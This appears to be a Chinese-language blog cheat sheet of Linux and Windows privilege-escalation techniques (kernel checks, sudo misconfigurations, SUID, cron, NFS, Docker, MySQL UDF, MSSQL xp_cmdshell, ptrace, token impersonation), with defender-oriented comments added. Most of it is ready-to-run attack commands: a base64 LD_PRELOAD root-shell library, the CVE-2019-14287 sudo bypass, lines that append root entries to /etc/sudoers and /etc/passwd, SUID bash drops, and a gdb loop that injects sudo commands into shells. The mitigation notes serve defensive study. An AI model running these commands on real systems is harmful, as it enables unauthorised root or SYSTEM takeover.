系统提权


系统内核

Linux

# Kernel release plus distribution identity. From the defender's side this is the
# baseline to compare against the vendor's current patch level; an old kernel here
# is the finding, and the fix is patching rather than anything on this page.
uname -a && cat /etc/*-release

Windows

#https://i.hacking8.com/tiquan
# External site the author references for mapping installed KB numbers to patch
# state (third-party, not verified here).
# Prints OS version and the installed hotfix (KB) list; a reviewer checks which
# KBs are missing relative to the current cumulative update.
systeminfo | findstr "OS KB"

错误配置

Linux

#NOPASSWD
# Lists the caller's sudo rules. Any NOPASSWD entry, wildcard, or rule granting
# an editor/interpreter is a misconfiguration to remove from /etc/sudoers.
sudo -l
#LD_PRELOAD
# Only relevant when sudoers keeps LD_PRELOAD via env_keep; the default env_reset
# strips it. The base64 blob is a short C source compiled below into a shared
# object that the sudo'd command would load. Mitigation: remove LD_PRELOAD from
# env_keep and keep env_reset on.
echo I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgp2b2lkIF9pbml0KCkgewoJdW5zZXRlbnYoIkxEX1BSRUxPQUQiKTsKCXNldGdpZCgwKTsKCXNldHVpZCgwKTsKCXN5c3RlbSgiL2Jpbi9zaCIpOwp9 | base64 -d > /tmp/shell.c && gcc -fPIC -shared -nostartfiles /tmp/shell.c -o /tmp/shell.so
sudo LD_PRELOAD=/tmp/shell.so <COMMAND>
#CVE-2019-14287 && (ALL, !root)
# Applies to sudo before 1.8.28 when a rule is written as (ALL, !root): uid -1 /
# 4294967295 slips past the !root exclusion. The fix is upgrading sudo; the
# "allow everyone except root" rule form is itself the smell to rewrite.
sudo -u#-1 <COMMAND>
sudo -u#4294967295 <COMMAND>
# Enumerate setuid / setgid files system-wide. Diff the list against the
# distribution's expected set; anything extra is what needs explaining.
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
  • RPATH
# Dynamic section of a binary (replace xxx with the path): NEEDED libraries and any
# hard-coded RPATH. A setuid binary whose RPATH points at a directory others can
# write to is the misconfiguration; fix the directory permissions or relink.
readelf -d xxx | egrep "NEEDED|RPATH"
  • Crontab
# Scheduled jobs for the current user and system-wide. Jobs run as root from a
# script or directory that a lower-privileged user can write to are the finding;
# the fix is ownership/permissions on the referenced paths, not the cron entry.
crontab -l
ls -al /etc/cron*
ls -al /var/spool/cron/*
  • Writable
# Find regular files writable by the caller but owned by someone else, skipping
# /sys and /proc pseudo-filesystems.
find / -writable ! -user "$(whoami)" ! -path "/sys/*" ! -path "/proc/*" -type f -exec ls -la {} \; 2>/dev/null
#/etc/sudoers
# Only possible when /etc/sudoers itself is writable by the caller; it should be
# root:root mode 0440. Appending directly also bypasses visudo's syntax check.
# File-integrity monitoring on this path catches the write.
echo "user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
#/etc/passwd
# Same precondition for /etc/passwd (root-owned, 0644). The appended entry carries
# its own MD5-crypt hash and uid/gid 0; any new uid-0 line here is a high-signal
# integrity alert.
echo "user:$(openssl passwd -1 admin@888..):0:0:user:/:/bin/bash" >> /etc/passwd

Windows

  • ServicePermission
# Metasploit module targeting services whose configuration or binary the current
# user may modify (weak service DACLs). Audit: review service security descriptors
# and the ACLs on service executables; tighten to SYSTEM/Administrators.
use exploit/windows/local/service_permissions
  • TrustedServicePath
use exploit/windows/local/unquoted_service_path
# Lists auto/manual-start services with their binary path, excluding entries
# under Windows. A path containing spaces that is not quoted is the finding; the
# fix is quoting the ImagePath. The trailing "" is presumably meant to drop
# already-quoted paths; the quoting looks fragile, so verify it in the shell used.
wmic service get name, pathname, startmode | findstr /i "Auto Manual" | findstr /i /v "Windows ""
  • AlwaysInstallElevated
use exploit/windows/local/always_install_elevated
# Both policy values must be 1 for MSI packages to install with SYSTEM rights.
# Either key set to 1 is a policy misconfiguration: set both to 0 or remove the
# policy via GPO.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

应用服务

Linux

  • NFS
#/etc/exports && no_root_squash
# Precondition: the export is configured with no_root_squash, so files created
# over the mount keep uid 0. Fix: drop no_root_squash from /etc/exports
# (root_squash is the default) and restrict the export to known hosts.
showmount -e x.x.x.x
mount -t nfs x.x.x.x:/yyyy /mnt
cd /mnt && cp /bin/bash . && chmod u+s bash
  • MySQL
# sqlmap direct connection with --os-shell. Presumably relies on the MySQL
# account holding FILE / write access to the plugin directory; the root cause is
# an over-privileged database account, and the fix is least privilege on it.
sqlmap -d "mysql://user:passwd@host:3306/mysql" --os-shell
  • Docker
# Bind-mounts the host root into a container; requires access to the Docker
# daemon (docker group), which is equivalent to root on the host. The second
# line runs inside the container. Fix: do not grant the docker socket/group to
# unprivileged users.
docker run -it --rm -v /:/host alpine
cd /host/tmp && cp /host/bin/bash . && chmod u+s bash

Windows

  • MySQL
/* Server version */
select version();
/* File read/write setting: NULL => disabled, empty string => unrestricted.
   Hardening: set secure_file_priv to a dedicated directory and keep FILE
   privilege off ordinary accounts. */
show variables like "secure_file_priv";
/* Plugin directory; it must not be writable by the account mysqld runs as. */
show variables like "%plugin%";
/* UDF && MySQL<5.1 (C:/Windows/System32/), MySQL>5.1 (MySQL/lib/plugin/) */
/* Writes a binary (0x4d5a90... is the truncated MZ header placeholder) into the
   plugin directory, then registers it as a function. Running mysqld as a
   low-privilege service account limits what such a function can do. */
select 0x4d5a900... into dumpfile "xxx";
create function sys_eval returns string soname "UDF.dll";
select sys_eval("whoami");
drop function sys_eval;
/* MOF && Windows<=2003 (Metasploit module) */
use exploit/windows/mysql/mysql_mof
  • MSSQL
/* xp_cmdshell */
/* Both sp_configure calls need sysadmin; the changes are visible in the
   server configuration and in audit/default trace. Keep xp_cmdshell disabled
   and alert on it being enabled. */
exec sp_configure "show advanced options", 1; reconfigure;
exec sp_configure "xp_cmdshell", 1; reconfigure;
exec master..xp_cmdshell "whoami";
/* sp_oacreate */
/* Same precondition and same detection point as xp_cmdshell: "Ole Automation
   Procedures" should stay off; the statement below creates a WScript.Shell
   object and invokes its run method. */
exec sp_configure "show advanced options", 1; reconfigure;
exec sp_configure "Ole Automation Procedures", 1; reconfigure;
declare @shell int exec sp_oacreate "wscript.shell", @shell output exec sp_oamethod @shell, "run", null, "C:\Windows\System32\cmd.exe /c whoami"

令牌操纵

Linux

#/proc/sys/kernel/yama/ptrace_scope == 0
# Only works when Yama ptrace_scope is 0 (any same-uid process may be traced):
# attaches gdb to each of the user's own shells and relies on a still-valid sudo
# timestamp in one of them. Setting ptrace_scope to 1 or higher and a short sudo
# timestamp_timeout closes this.
for PID in $(pgrep "^(bash|dash|sh|zsh)$" -u $(id -u)); do echo "call system(\"echo | sudo -S chmod +s /bin/sh &>/dev/null\")" | gdb -q -n -p $PID &>/dev/null; done

Windows

  • Meterpreter
# Meterpreter incognito: lists tokens reachable from the current process and
# impersonates SYSTEM. This and the Potato-style tool below both hinge on
# SeImpersonatePrivilege, which service accounts hold by default; running
# services under least-privilege accounts and monitoring token impersonation
# events are the defensive levers.
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
SweetPotato.exe -e PrintSpoofer -a "whoami"

文章作者: DongHuangT1
版权声明: 本博客所有文章除特别声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !